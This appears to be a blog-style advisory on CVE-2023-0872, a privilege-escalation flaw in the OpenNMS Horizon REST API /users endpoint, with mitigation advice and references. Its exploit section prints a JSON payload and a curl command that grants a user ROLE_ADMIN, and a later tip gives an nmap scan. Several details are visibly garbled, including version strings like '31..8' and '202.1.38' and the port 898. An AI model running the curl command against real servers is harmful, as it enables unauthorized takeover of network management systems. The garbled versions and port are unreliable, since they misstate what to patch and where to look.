CVE-2023-0872 - How a REST API Vulnerability in OpenNMS Horizon Exposed Privilege Escalation

---

Overview

In early 2023, a major security vulnerability was identified in OpenNMS Horizon, an open-source network management system. This issue, tracked as CVE-2023-0872, affects Horizon 31..8 and all earlier versions back from 32..2. If you are running any version lower than 32..2, your Horizon installation is at risk.

The root of this problem lies in the Horizon REST API — specifically, its /users endpoint. This endpoint can be abused by attackers to gain higher privileges within the application, which could lead to full compromise in some deployment scenarios.

What Is OpenNMS?

OpenNMS is a popular open-source solution for monitoring networks, designed to manage tens of thousands of devices from a single instance. Users can install Horizon (the latest/fast-moving version) or Meridian (the commercial, stable offering).

What is CVE-2023-0872?

CVE-2023-0872 is an Elevation of Privilege (EoP) vulnerability. This means a regular or lower-privileged user could misuse the Horizon REST API /users endpoint in a way that lets them escalate their account to an administrator or other privileged state.

Attack vector:

- REST API endpoint (specifically /users)

Dissecting the Vulnerability

The REST API of OpenNMS Horizon exposes several sensitive endpoints, including one for managing users. Prior to the patch, insufficient permission checks allowed users to alter their own or other users’ roles. For example:

POST /rest/users/johndoe
Content-Type: application/json

{
  "username": "johndoe",
  "role": "ROLE_ADMIN"
}

If authentication and authorization were not tightly enforced, a normal user could POST this payload and grant themselves admin rights. This, in turn, allows full control over the monitoring system.

Exploit Scenario

Scenario:

Assuming the API is unpatched and basic authentication applies

curl -u johndoe:password \
  -X POST https://nms.example.com/rest/users/johndoe \
  -H "Content-Type: application/json" \
  -d '{"username":"johndoe","role":"ROLE_ADMIN"}'

If the API does not enforce privilege separation, the user "johndoe" instantly becomes an administrator.

Upgrade to 2023.1.6, 2022.1.19, 2021.1.30, or 202.1.38.

Download the latest OpenNMS Horizon releases here.
Meridian release notes and downloads.

Review API Logs:

- Look for suspicious POST or PUT requests to /rest/users endpoints.

Never expose admin dashboards or REST APIs to the public internet.

- Subscribe to OpenNMS security advisories.

Official References

- OpenNMS Security Notification: CVE-2023-0872
- OpenNMS Horizon Release Notes
- OSS-Security Announcement
- NVD Entry for CVE-2023-0872

Conclusion

CVE-2023-0872 is a critical reminder that even “internal only” tools can expose you to serious risk. Vulnerabilities in management systems, especially those with broad access to sensitive infrastructure, can have devastating consequences.

The only safe path is to upgrade as soon as possible, follow best practices for network segmentation, and *never* expose these services to the open internet.

If you rely on OpenNMS Horizon or Meridian, take this as your cue to check your version, patch up, and audit your access controls right away.


Exclusive Tip:
If you ever need to quickly detect if your OpenNMS REST API is exposed, run a simple nmap scan from outside your organization (such as from a VPN or a cloud VPS):

nmap -p 898 nms.example.com

Timeline

Published on: 08/14/2023 18:15:00 UTC
Last modified on: 08/21/2023 17:12:00 UTC